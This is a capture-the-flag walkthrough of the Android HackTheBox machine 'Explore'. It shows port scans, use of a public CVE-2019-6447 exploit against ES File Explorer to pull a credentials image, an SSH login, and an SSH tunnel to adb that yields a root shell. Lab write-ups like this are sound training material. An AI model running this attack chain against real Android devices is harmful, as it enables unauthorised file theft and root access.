HackTheBox - Explore
| OS | Difficulty | IP Address | Status |
|---|---|---|---|
| Android | Easy | 10.10.10.247 | Retired |
This was classified as an easy box by bertolis on HackTheBox and my first experience with Android exploitation. Enumerating the opened ports, we discover a SSH, Android Debug Bridge (adb), and ES File Explorer, which is vulnerable to CVE-2019-6447 and will be our method to gain foothold. For privilege escalation, we will setup a SSH Tunnel to execute adb commands and gain root.
Phase 1 - Enumeration
Nmap
We first run a network scan to enumerate open ports.
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.91%I=7%D=10/25%Time=6176573F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
From the results above, we see that SSH is opened on port 2222 and it’s banner states that it’s “Banana Studio.” A quick Google search reveals that Banana Studio is a SSH Server for Android operating systems.
Since we are not sure whether the output of previous nmap command shows all open ports, we will also run a full port scan on the target with the following:
sudo nmap -p- 10.10.10.247
OUTPUT:
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
42135/tcp open unknown
45225/tcp open unknown
59777/tcp open unknown
Seeing that the four ports running were (2222, 5555, 42135, 45225, 59777) We did some research on common uses of those ports on Android operating systems. Information I found included:
- 2222: SimpleSSH
- 5555: Android Debug Bridge (ADB)
- 59777: ES File Explorer
Phase 2 - Exploitation
CVE-2019-6447
Doing some research on each port, we find something on port 59777 which is for ES File Explorer, we find a vulnerability that allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local network.
Looking in ExploitDB, we find a proof-of-concept Python exploit script for CVE-2019-6447
Running the Python script with the following commands shows us the listings on the directory:
python3 exploit.py listPics 10.10.10.247
OUTPUT:
Let’s download creds.jpg with the following command.
python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
And open the image.
And we got some credentials, we will try to login with the SSH Server opened on the Android device with the following command:
ssh kristi@10.10.10.247 -p 2222
OUTPUT:
And we get in, gaining our foothold! user.txt can be found in sdcard/user.txt
Phase 3 - Privilege Escalation
Port Forwarding
Since we have access to the device through SSH, and we know that there’s an ADB service running on port 5555; means we can execute commands with ADB.
In order to run ADB commands on the device, we will have to set up SSH port forwarding with the following command:
ssh kristi@10.10.10.247 -p 2222 -L 5555:localhost:5555
Android Debug Bridge (adb)
ADB commands help ⇐ Official documentation to adb commands.
We will run the following commands on the device, gain a shell, and escalate that shell to root.
# to establist a connection
adb connect 127.0.0.1:5555
# to list connected devices
adb devices
# to connect to specified device with interactive shell
adb -s 127.0.0.1:5555 shell
And we are root! root.txt can be found in /data/root.txt
Post a Comment